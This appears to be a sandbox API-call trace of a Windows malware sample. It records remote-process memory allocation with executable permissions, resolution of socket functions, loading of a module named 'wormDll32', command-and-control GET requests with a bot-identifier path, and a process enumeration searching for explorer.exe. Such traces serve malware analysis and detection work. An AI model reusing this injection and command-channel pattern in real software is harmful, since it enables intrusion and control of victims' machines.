	[0240.361] SignalObjectAndWait (hObjectToSignal=0x6c8, hObjectToWaitOn=0x680, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0240.361] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x128504*=0x70) returned 1
	[0240.361] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x120000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.361] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e1630) returned 1
	[0240.361] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.362] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0240.362] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0240.362] lstrlenA (lpString="inet_addr") returned 9
	[0240.362] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0240.362] ResetEvent (hEvent=0x680) returned 1
	[0240.363] SignalObjectAndWait (hObjectToSignal=0x6c8, hObjectToWaitOn=0x680, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0240.363] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x128504*=0x70) returned 1
	[0240.363] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x120000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.363] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e1630) returned 1
	[0240.363] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.364] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0240.364] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0240.364] lstrlenA (lpString="inet_ntoa") returned 9
	[0240.364] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0240.365] ResetEvent (hEvent=0x680) returned 1
	[0240.365] SignalObjectAndWait (hObjectToSignal=0x6c8, hObjectToWaitOn=0x680, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0240.365] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x128504*=0x70) returned 1
	[0240.365] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x120000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.365] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e1630) returned 1
	[0240.365] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.366] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0240.366] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0240.366] lstrlenA (lpString="ioctlsocket") returned 11
	[0240.366] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0240.367] ResetEvent (hEvent=0x680) returned 1
	[0240.367] SignalObjectAndWait (hObjectToSignal=0x6c8, hObjectToWaitOn=0x680, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0240.367] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x128504*=0x70) returned 1
	[0240.367] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x120000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.367] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e1630) returned 1
	[0240.367] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.368] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0240.368] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0240.368] lstrlenA (lpString="recv") returned 4
	[0240.368] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0x5, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0240.369] ResetEvent (hEvent=0x680) returned 1
	[0240.369] SignalObjectAndWait (hObjectToSignal=0x6c8, hObjectToWaitOn=0x680, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0240.369] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x128504*=0x70) returned 1
	[0240.369] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x120000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.369] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e1630) returned 1
	[0240.369] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.369] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0240.370] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0240.370] lstrlenA (lpString="select") returned 6
	[0240.370] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0x7, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0240.370] ResetEvent (hEvent=0x680) returned 1
	[0240.370] SignalObjectAndWait (hObjectToSignal=0x6c8, hObjectToWaitOn=0x680, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0240.371] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x128504*=0x70) returned 1
	[0240.371] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x120000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.371] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e1630) returned 1
	[0240.371] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.371] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0240.371] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0240.371] lstrlenA (lpString="send") returned 4
	[0240.371] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0x5, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0240.372] ResetEvent (hEvent=0x680) returned 1
	[0240.372] SignalObjectAndWait (hObjectToSignal=0x6c8, hObjectToWaitOn=0x680, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0240.372] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x128504*=0x70) returned 1
	[0240.372] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x120000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.373] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e1630) returned 1
	[0240.373] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.373] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0240.373] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0240.373] lstrlenA (lpString="setsockopt") returned 10
	[0240.373] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0xb, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0240.374] ResetEvent (hEvent=0x680) returned 1
	[0240.374] SignalObjectAndWait (hObjectToSignal=0x6c8, hObjectToWaitOn=0x680, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0240.374] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x128504*=0x70) returned 1
	[0240.374] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x120000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.374] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e1630) returned 1
	[0240.374] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.375] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0240.375] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0240.375] lstrlenA (lpString="socket") returned 6
	[0240.375] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0x7, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0240.376] ResetEvent (hEvent=0x680) returned 1
	[0240.376] SignalObjectAndWait (hObjectToSignal=0x6c8, hObjectToWaitOn=0x680, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0240.376] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x128504*=0x70) returned 1
	[0240.376] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x120000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.376] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e1630) returned 1
	[0240.376] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.376] lstrcmpA (lpString1="Control", lpString2="Start") returned -1
	[0240.376] lstrcmpA (lpString1="Control", lpString2="Control") returned 0
	[0240.376] lstrcmpA (lpString1="FreeBuffer", lpString2="Start") returned -1
	[0240.376] lstrcmpA (lpString1="FreeBuffer", lpString2="Control") returned 1
	[0240.377] lstrcmpA (lpString1="FreeBuffer", lpString2="FreeBuffer") returned 0
	[0240.377] lstrcmpA (lpString1="JNI_OnLoad", lpString2="Start") returned -1
	[0240.377] lstrcmpA (lpString1="JNI_OnLoad", lpString2="Control") returned 1
	[0240.377] lstrcmpA (lpString1="JNI_OnLoad", lpString2="FreeBuffer") returned 1
	[0240.377] lstrcmpA (lpString1="JNI_OnLoad", lpString2="Release") returned -1
	[0240.377] lstrcmpA (lpString1="JNI_OnUnload", lpString2="Start") returned -1
	[0240.377] lstrcmpA (lpString1="JNI_OnUnload", lpString2="Control") returned 1
	[0240.377] lstrcmpA (lpString1="JNI_OnUnload", lpString2="FreeBuffer") returned 1
	[0240.377] lstrcmpA (lpString1="JNI_OnUnload", lpString2="Release") returned -1
	[0240.377] lstrcmpA (lpString1="Release", lpString2="Start") returned -1
	[0240.377] lstrcmpA (lpString1="Release", lpString2="Control") returned 1
	[0240.377] lstrcmpA (lpString1="Release", lpString2="FreeBuffer") returned 1
	[0240.377] lstrcmpA (lpString1="Release", lpString2="Release") returned 0
	[0240.377] lstrcmpA (lpString1="Start", lpString2="Start") returned 0
	[0240.377] VirtualProtectEx (in: hProcess=0x6bc, lpAddress=0x6cd41000, dwSize=0x8a14, flNewProtect=0x20, lpflOldProtect=0x1286f4 | out: lpflOldProtect=0x1286f4*=0x4) returned 1
	[0240.378] VirtualProtectEx (in: hProcess=0x6bc, lpAddress=0x6cd4a000, dwSize=0x19c4, flNewProtect=0x4, lpflOldProtect=0x1286f4 | out: lpflOldProtect=0x1286f4*=0x4) returned 1
	[0240.378] VirtualProtectEx (in: hProcess=0x6bc, lpAddress=0x6cd4c000, dwSize=0xafc, flNewProtect=0x2, lpflOldProtect=0x1286f4 | out: lpflOldProtect=0x1286f4*=0x4) returned 1
	[0240.378] VirtualProtectEx (in: hProcess=0x6bc, lpAddress=0x6cd4d000, dwSize=0xff4, flNewProtect=0x4, lpflOldProtect=0x1286f4 | out: lpflOldProtect=0x1286f4*=0x4) returned 1
	[0240.378] VirtualProtectEx (in: hProcess=0x6bc, lpAddress=0x6cd4e000, dwSize=0xaa, flNewProtect=0x2, lpflOldProtect=0x1286f4 | out: lpflOldProtect=0x1286f4*=0x4) returned 1
	[0240.378] VirtualProtectEx (in: hProcess=0x6bc, lpAddress=0x6cd4f000, dwSize=0xa44, flNewProtect=0x4, lpflOldProtect=0x1286f4 | out: lpflOldProtect=0x1286f4*=0x4) returned 1
	[0240.378] VirtualProtectEx (in: hProcess=0x6bc, lpAddress=0x6cd50000, dwSize=0x2c, flNewProtect=0x4, lpflOldProtect=0x1286f4 | out: lpflOldProtect=0x1286f4*=0x4) returned 1
	[0240.379] VirtualProtectEx (in: hProcess=0x6bc, lpAddress=0x6cd51000, dwSize=0x20, flNewProtect=0x4, lpflOldProtect=0x1286f4 | out: lpflOldProtect=0x1286f4*=0x4) returned 1
	[0240.379] VirtualProtectEx (in: hProcess=0x6bc, lpAddress=0x6cd52000, dwSize=0x538, flNewProtect=0x2, lpflOldProtect=0x1286f4 | out: lpflOldProtect=0x1286f4*=0x4) returned 1
	[0240.379] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x128660, nSize=0x70, lpNumberOfBytesRead=0x128640 | out: lpBuffer=0x128660*, lpNumberOfBytesRead=0x128640*=0x70) returned 1
	[0240.379] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c0648
	[0240.379] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0240.380] ResetEvent (hEvent=0x680) returned 1
	[0240.380] SignalObjectAndWait (hObjectToSignal=0x6c8, hObjectToWaitOn=0x680, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0240.380] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x128660, nSize=0x70, lpNumberOfBytesRead=0x128638 | out: lpBuffer=0x128660*, lpNumberOfBytesRead=0x128638*=0x70) returned 1
	[0240.380] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.380] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0648) returned 1
	[0240.380] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x286be98) returned 1
	[0240.380] lstrlenA (lpString="wormDll32") returned 9
	[0240.380] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0240.382] ResetEvent (hEvent=0x680) returned 1
	[0240.382] SignalObjectAndWait (hObjectToSignal=0x6c8, hObjectToWaitOn=0x680, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0240.382] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x128b00, nSize=0x70, lpNumberOfBytesRead=0x128ad8 | out: lpBuffer=0x128b00*, lpNumberOfBytesRead=0x128ad8*=0x70) returned 1
	[0240.382] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x500000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.382] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27dae28) returned 1
	[0240.382] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x4e0000, lpBuffer=0x128fec, nSize=0x400, lpNumberOfBytesRead=0x128b90 | out: lpBuffer=0x128fec*, lpNumberOfBytesRead=0x128b90*=0x400) returned 1
	[0240.382] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x4e0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.382] GetFullPathNameW (in: lpFileName="Data\\", nBufferLength=0x105, lpBuffer=0x128480, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\", lpFilePart=0x0) returned 0x36
	[0240.382] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x4f0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.383] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x120000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.383] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.383] lstrlenA (lpString="control") returned 7
	[0240.383] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0x8, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0240.384] ResetEvent (hEvent=0x680) returned 1
	[0240.384] SignalObjectAndWait (hObjectToSignal=0x6c8, hObjectToWaitOn=0x680, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0240.385] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x128af0, nSize=0x70, lpNumberOfBytesRead=0x128ac8 | out: lpBuffer=0x128af0*, lpNumberOfBytesRead=0x128ac8*=0x70) returned 1
	[0240.385] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x510000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.385] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27dae28) returned 1
	[0240.385] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x4f0000, lpBuffer=0x128f6c, nSize=0x80, lpNumberOfBytesRead=0x128b84 | out: lpBuffer=0x128f6c*, lpNumberOfBytesRead=0x128b84*=0x80) returned 1
	[0240.385] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x4e0000, lpBuffer=0x128fec, nSize=0x400, lpNumberOfBytesRead=0x128b84 | out: lpBuffer=0x128fec*, lpNumberOfBytesRead=0x128b84*=0x400) returned 1
	[0240.385] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x500004, lpBuffer=0x128bb0, nSize=0x4, lpNumberOfBytesRead=0x128b84 | out: lpBuffer=0x128bb0*, lpNumberOfBytesRead=0x128b84*=0x4) returned 1
	[0240.385] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x500000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.385] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x4f0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.385] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x120000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.385] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.386] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2275d00) returned 1
	[0240.386] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x0) returned 0x2275d00
	[0240.386] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778460) returned 1
	[0240.386] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffcf0) returned 1
	[0240.386] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffcf0
	[0240.386] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff300
	[0240.386] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffa50) returned 1
	[0240.386] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22fff90) returned 1
	[0240.386] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffee8) returned 1
	[0240.386] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e1570) returned 1
	[0240.386] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e15d0) returned 1
	[0240.386] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff9a8) returned 1
	[0240.386] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e1558) returned 1
	[0240.386] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x1e6730) returned 1
	[0240.386] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x40) returned 0x22c79c8
	[0240.386] WinHttpCloseHandle (hInternet=0x24a3b8) returned 1
	[0240.386] WinHttpSetTimeouts (hInternet=0x1f2598, nResolveTimeout=90000, nConnectTimeout=90000, nSendTimeout=180000, nReceiveTimeout=600000) returned 1
	[0240.386] WinHttpOpenRequest (hConnect=0x22c4dc0, pwszVerb="GET", pwszObjectName="/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/10/62/68976058/1/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x27e7968
	[0240.386] WinHttpSetOption (hInternet=0x27e7968, dwOption=0x1f, lpBuffer=0x128be4, dwBufferLength=0x4) returned 1
	[0240.386] WinHttpSendRequest (hRequest=0x27e7968, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0, dwTotalLength=0x0, dwContext=0x0) returned 1
	[0240.803] WinHttpReceiveResponse (hRequest=0x27e7968, lpReserved=0x0) returned 1
	[0240.803] WinHttpQueryHeaders (in: hRequest=0x27e7968, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x128bd4, lpdwBufferLength=0x128bd0, lpdwIndex=0x0 | out: lpBuffer=0x128bd4*, lpdwBufferLength=0x128bd0*=0x4, lpdwIndex=0x0) returned 1
	[0240.803] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x242550, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 1
	[0240.803] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x27e1768
	[0240.804] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x242550, cbMultiByte=-1, lpWideCharStr=0x27e1768, cchWideChar=1 | out: lpWideCharStr="") returned 1
	[0240.804] WinHttpCloseHandle (hInternet=0x27e7968) returned 1
	[0240.804] WinHttpSetTimeouts (hInternet=0x1f2598, nResolveTimeout=90000, nConnectTimeout=90000, nSendTimeout=180000, nReceiveTimeout=600000) returned 1
	[0240.804] WinHttpOpenRequest (hConnect=0x22c4dc0, pwszVerb="GET", pwszObjectName="tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/63/wormDll/control///", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x27e7968
	[0240.804] WinHttpSetOption (hInternet=0x27e7968, dwOption=0x1f, lpBuffer=0x128bbc, dwBufferLength=0x4) returned 1
	[0240.804] WinHttpSendRequest (hRequest=0x27e7968, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0, dwTotalLength=0x0, dwContext=0x0) returned 1
	[0241.242] WinHttpReceiveResponse (hRequest=0x27e7968, lpReserved=0x0) returned 1
	[0241.242] WinHttpQueryHeaders (in: hRequest=0x27e7968, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x128bac, lpdwBufferLength=0x128ba8, lpdwIndex=0x0 | out: lpBuffer=0x128bac*, lpdwBufferLength=0x128ba8*=0x4, lpdwIndex=0x0) returned 1
	[0241.242] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e1768) returned 1
	[0241.242] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x6e4
	[0241.245] Process32FirstW (in: hSnapshot=0x6e4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0241.246] lstrcmpW (lpString1="explorer.exe", lpString2="[System Process]") returned 1
	[0241.246] Process32NextW (in: hSnapshot=0x6e4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0241.247] lstrcmpW (lpString1="explorer.exe", lpString2="System") returned -1
	[0241.247] Process32NextW (in: hSnapshot=0x6e4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0241.249] lstrcmpW (lpString1="explorer.exe", lpString2="smss.exe") returned -1
	[0241.249] Process32NextW (in: hSnapshot=0x6e4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0241.250] lstrcmpW (lpString1="explorer.exe", lpString2="csrss.exe") returned 1
	[0241.250] Process32NextW (in: hSnapshot=0x6e4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0241.251] lstrcmpW (lpString1="explorer.exe", lpString2="wininit.exe") returned -1
	[0241.251] Process32NextW (in: hSnapshot=0x6e4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0241.252] lstrcmpW (lpString1="explorer.exe", lpString2="csrss.exe") returned 1
	[0241.252] Process32NextW (in: hSnapshot=0x6e4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0241.253] lstrcmpW (lpString1="explorer.exe", lpString2="winlogon.exe") returned -1
	[0241.253] Process32NextW (in: hSnapshot=0x6e4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0241.254] lstrcmpW (lpString1="explorer.exe", lpString2="services.exe") returned -1
	[0241.254] Process32NextW (in: hSnapshot=0x6e4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0241.255] lstrcmpW (lpString1="explorer.exe", lpString2="lsass.exe") returned -1
	[0241.255] Process32NextW (in: hSnapshot=0x6e4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0241.256] lstrcmpW (lpString1="explorer.exe", lpString2="lsm.exe") returned -1
	[0241.256] Process32NextW (in: hSnapshot=0x6e4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0241.257] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
